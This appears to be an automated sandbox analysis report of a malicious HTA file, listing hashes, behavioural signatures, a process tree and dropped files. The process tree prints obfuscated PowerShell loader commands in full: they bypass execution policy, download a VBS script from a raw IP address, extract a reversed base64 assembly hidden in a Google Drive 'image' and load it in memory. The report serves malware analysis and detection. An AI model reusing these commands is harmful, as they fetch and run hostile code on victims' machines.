Analysis
-
max time kernel
105s -
max time network
111s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
26-10-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta
Resource
win10v2004-20241007-en
General
-
Target
b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta
-
Size
130KB
-
MD5
401fa9878282b2404925d1ac2599b7c0
-
SHA1
876d5ea4b89ef48cd614fc098154e3e2caa176f3
-
SHA256
b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948
-
SHA512
45e2de1e196ae5339df31581bd8e98af094ab461f80269a815f369e51e131a885bb9745c60375aa4c95db75e82d58f799c5ae480ac2aa0b8387baa2aea2d0f63
-
SSDEEP
96:Eam73bDpMZMY9pMZMUyOX/DJfqMtJNpMZMVx7T:Ea23bDCuY9Cuitht/CuV9T
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2052 PoWErSHEll.EXE 6 2336 powershell.exe 8 2336 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2456 powershell.exe 2336 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2052 PoWErSHEll.EXE 2808 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PoWErSHEll.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2052 PoWErSHEll.EXE 2808 powershell.exe 2052 PoWErSHEll.EXE 2052 PoWErSHEll.EXE 2456 powershell.exe 2336 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2052 PoWErSHEll.EXE Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1268 wrote to memory of 2052 1268 mshta.exe 29 PID 1268 wrote to memory of 2052 1268 mshta.exe 29 PID 1268 wrote to memory of 2052 1268 mshta.exe 29 PID 1268 wrote to memory of 2052 1268 mshta.exe 29 PID 2052 wrote to memory of 2808 2052 PoWErSHEll.EXE 31 PID 2052 wrote to memory of 2808 2052 PoWErSHEll.EXE 31 PID 2052 wrote to memory of 2808 2052 PoWErSHEll.EXE 31 PID 2052 wrote to memory of 2808 2052 PoWErSHEll.EXE 31 PID 2052 wrote to memory of 2868 2052 PoWErSHEll.EXE 32 PID 2052 wrote to memory of 2868 2052 PoWErSHEll.EXE 32 PID 2052 wrote to memory of 2868 2052 PoWErSHEll.EXE 32 PID 2052 wrote to memory of 2868 2052 PoWErSHEll.EXE 32 PID 2868 wrote to memory of 2856 2868 csc.exe 33 PID 2868 wrote to memory of 2856 2868 csc.exe 33 PID 2868 wrote to memory of 2856 2868 csc.exe 33 PID 2868 wrote to memory of 2856 2868 csc.exe 33 PID 2052 wrote to memory of 564 2052 PoWErSHEll.EXE 35 PID 2052 wrote to memory of 564 2052 PoWErSHEll.EXE 35 PID 2052 wrote to memory of 564 2052 PoWErSHEll.EXE 35 PID 2052 wrote to memory of 564 2052 PoWErSHEll.EXE 35 PID 564 wrote to memory of 2456 564 WScript.exe 36 PID 564 wrote to memory of 2456 564 WScript.exe 36 PID 564 wrote to memory of 2456 564 WScript.exe 36 PID 564 wrote to memory of 2456 564 WScript.exe 36 PID 2456 wrote to memory of 2336 2456 powershell.exe 38 PID 2456 wrote to memory of 2336 2456 powershell.exe 38 PID 2456 wrote to memory of 2336 2456 powershell.exe 38 PID 2456 wrote to memory of 2336 2456 powershell.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE"C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rq4dsw_v.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES844E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC844D.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2856
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD575e41c8e72a840ec1309fafff688e806
SHA109bd604d481c0787bb21d709992e2661fa77c209
SHA256a95438054bf9fc1750cbab3e2b41b1c45af3a85d30334362cf4e52ed68f75d83
SHA5128919691099a040900fe5c0d18e1c99e0bd954d7f5d7f8bf7edffac06d49275502b236b1b8bdfb1ea1021ff2739d36a161417f7a99a3d437a968710ad8828f5ab
-
Filesize
3KB
MD55e9058699bc1628799556d81f0580a69
SHA1701a6c0cfc3cdcee5a78a0e75f128a4e2f468d14
SHA256a6fd8561ff61453a6851423a6e6b90c267db98fd7d1afb6bd037ec1f01827fc5
SHA5128322b571ae4eedb6c7543fda6fae9ac205c39ac40b60d3eef846f9b9c8756e35bbca7269368fb1236f44ac9683441f4a3c51414dca760b1589da118788447477
-
Filesize
7KB
MD582bd584357c188c891e0a1c9cb0bbe5d
SHA1774fdf85ac4b6c107c9ce278a56668e08ee96124
SHA256512555548063d2ba992f23393002abca2bb626d1d58cec5dfe92a175e3baceed
SHA512586479f4ff0c978f5bdd63b8ca5ff1fc40d2c24a1e9e463172d4f51a5d243e231480eb24bc5b60b6bc6a0aa8c08af7a9e05f1cb8a59a9ff454eb25fd0a521c49
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56bb013f7e81198c190a498c1e1d10c14
SHA1c68c5f61c179beff018959bb6b4a609727e1251c
SHA256bdfb4cc49a1e39675054a977f891cc2e623e45a84b0b126f3ed17036cc7a3e55
SHA512eb9d534c2a41a0e0c9f0e7ddefd55ada91b25ea07e9dae6ee668b86f8a2bfdac5cf702d7eeb58327fb5acb9af5b8b65da301202b59bf4a30ebfc0cd947e83145
-
Filesize
137KB
MD5fe9e18e3366ca7ac8c21eb1ce0631d9c
SHA151bc2bc37e87e2d64129cad63df697a68ee3b9d6
SHA25601c6399fc31b4cbfcf8e851ff3ff433d36b46da2577f9230b9c78b2cbf790912
SHA5127dca4fb22f5f1a6e08f6c993a7b159863b8b1a8898429aed78582641bc2340ce2fbe3e92f6ec5f9d6ec5c74a14009f77ce87602bea7ba59c4ea1e092d5a9f8f7
-
Filesize
652B
MD5a2f6110e50cf63dff9861a3335041f8b
SHA10959c6407c33fbdcddf559da607cb49d0de1ab38
SHA25689d46da0812bc820577fc0354f4cd58bd1dfea5b894f8fd02bad12dc39729611
SHA512e7347265f7a74d415dbafbb83f90f2910cd6e476dcb19358361928185a4ff7e4b27f63a3009b29334802b9f846cb15fdd4b45078bf6d6981d3e8874960a810e9
-
Filesize
471B
MD5465b774d7a1a641088ff65cb56d1755b
SHA1d65ff3c3ecd67b7da02d199d649abb75a8c64879
SHA256737ceb1cff20744c7d2eb5139717221cf2c96f10d05d5fffd3d916fd69a6d025
SHA512665f11dfa5a6a79b89c49724ad1943baea2ea54cb204ef3712abb948218064410b42ee96b29f067fc635bc71ec85295603567bf2e9121d381fa2dfbc6c07ea68
-
Filesize
309B
MD5bce9dbc1dde307346f8e429d852fce88
SHA1222e2083374d8718eabd2a35cdf3c0a97ca28138
SHA25666f2e3554fd1f5be18a880bb325d792880e27948baf0a64036a1aa2b0ce013db
SHA512ec545b9f0f2f42a55ed6d24471d767b6606b8f26afb3ce23e6516200596c62640cbcb48f494bd109afc73ef299269608ca2ba0eb268a5d8fed8e89800b6671ec